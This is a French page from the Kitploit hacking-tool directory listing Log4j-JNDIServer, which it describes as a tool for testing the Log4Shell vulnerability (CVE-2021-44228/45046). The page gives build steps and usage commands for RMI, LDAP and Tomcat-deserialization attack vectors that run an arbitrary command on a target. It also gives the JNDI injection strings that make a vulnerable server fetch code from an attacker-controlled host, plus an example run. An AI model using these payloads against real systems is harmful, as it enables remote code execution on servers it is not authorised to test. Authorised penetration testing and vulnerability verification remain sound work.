Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Log4j-JNDIServer — Ce projet aidera à tester la vulnérabilité Log4j CVE-2021-44228. | Kitploit
Outils/GitHubGitHub/immunityinc/log4j-jndiserver
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCommandement et ContrôleOutil d'Accès à Distance
GitHubimmunityinc/log4j-jndiserver

Log4j-JNDIServer

Ce projet aidera à tester la vulnérabilité Log4j CVE-2021-44228.

Voir le dépôt
92il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Log4j-JNDIServer

Ce projet permet de tester les vulnérabilités Log4j CVE-2021-44228/CVE-2021-45046.

Installation et construction

  • Chargez le projet dans Intellij Idea
  • Sélectionnez JDK dans "Project Settings" (CTRL + ALT + MAJ + S)
  • Dans "Project Settings", créez l'Artifact -> "Artifacts" -> "Create JAR from Modules" -> Dans "JAR files from libraries", cochez "extract to target JAR" -> "OK"
  • Construisez le projet (CTRL + F9). Cela créera le fichier jar dans le dossier /out/artifacts/

Construction avec Maven

Nécessite Java 1.8+ et Maven 3.x+

  • mvn clean package -DskipTests
  • Vous trouverez le fichier .jar dans le dossier /target

Utilisations

1.Vecteur d'attaque RMI

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 1 <RMI_IP> <RMI_PORT> <HTTP_PORT> <COMMAND>

Vous n'avez plus besoin d'héberger le fichier Exploit.class. L'application démarrera un serveur HTTP sur le port indiqué.

Vous devez indiquer la commande que vous souhaitez exécuter sur la cible.

Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}

2.Vecteur d'attaque LDAP

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 2 <LDAP_IP> <LDAP_PORT> <HTTP_PORT> <COMMAND>

Vous n'avez plus besoin d'héberger le fichier Exploit.class. L'application démarrera un serveur HTTP sur le port indiqué.

Vous devez indiquer la commande que vous souhaitez exécuter sur la cible.

Injection: {jndi:ldap://<LDAP_IP>:<LDAP_PORT>/Exploit}

3.Vecteur d'attaque par désérialisation (Utilisation de la charge utile Tomcat)

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 <RMI_IP> <RMI_PORT> <COMMAND>

Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}

Exemple

root@kitploit:~
$ java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 127.0.0.1 1389 /usr/bin/gnome-calculator
- Starting RMI Server for Tomcat  -
- Creating RMI Server on port 1389 -
- Reference bound! -
- RMI server started at 127.0.0.1:1389 -
- Log4J Injection Path: ${jndi:rmi://127.0.0.1:1389/Foo} -
Télécharger l’outil